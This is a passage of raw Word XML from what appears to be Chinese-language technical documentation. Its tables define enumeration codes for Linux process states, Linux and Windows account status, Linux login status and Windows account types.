            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="276B6C79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F2D1CAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>windows进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20293BA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="264" w:name="linux进程状态"/>
      <w:bookmarkEnd w:id="263"/>
      <w:r>
        <w:t>linux进程状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="685"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4115"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3637834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8E1492E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25C164AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="073FD0BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58A9F549" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AB32EFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171E08E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>R</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76488F2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可执行状态&amp;运行状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64B2D396" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B33CB10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D01DA9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B2C7C8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可中断的睡眠状态, 可处理signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7EB28C42" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B6BFB55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3895BD8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6395A39C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不可中断的睡眠状态, 可处理signal, 有延迟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42217045" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22BBB218" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15AC0EC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04BF836C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>暂停状态或跟踪状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7436E5CA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17DCDD16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F1A5C8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="015D529C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>退出状态，进程成为僵尸进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="791A5C49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="linux账号状态"/>
      <w:bookmarkEnd w:id="264"/>
      <w:r>
        <w:t>linux账号状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1564"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="260CEEC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353431A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C41E32F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76B55864" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="048282BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5930812F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D8D9D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E28F66C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07F9895F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DDDC5DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FFC2372" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66E8B1CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B17C613" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="windows账号状态"/>
      <w:bookmarkEnd w:id="265"/>
      <w:r>
        <w:t>windows账号状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1564"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="75E0AC6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A168219" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C89BF97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B87DAC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06E78D3A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4741E5E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="461D6852" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7137DB5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C36EE8F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C21A915" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>accountStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3260819E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B594EF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>锁定</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3004BDF1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="126AD0D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26D9DF48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F57A294" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40F7868A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="267" w:name="linux登录状态"/>
      <w:bookmarkEnd w:id="266"/>
      <w:r>
        <w:t>linux登录状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7BC43E0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2F13A9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B629B1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E5679A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="074F701F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328CB6DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B500856" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285CB318" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不可登入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3055151A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D8D04EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760272ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56FFD9D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不可交互登入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38D67392" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B1753EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58FB5787" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D59CB3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可交互登入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DF72615" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="161C796A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D6A9506" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CE3E5E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>key&amp;pwd登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D7CCDB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="windows账号类型"/>
      <w:bookmarkEnd w:id="267"/>
      <w:r>
        <w:t>windows账号类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="770C45A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7EBE5E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FDEB5D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DF2CF6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E558239" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD96606" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B2BB0F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="463019AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访客用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73A6DAAC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71719B06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E55189C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="119DF403" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标准用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58FB504D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="631FF28A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA8944A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D4DB3E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>管理员用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C447A68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="linux账户登录方式"/>
      <w:bookmarkEnd w:id="268"/>
      <w:r>
        <w:t>linux账户登录方式</w:t>
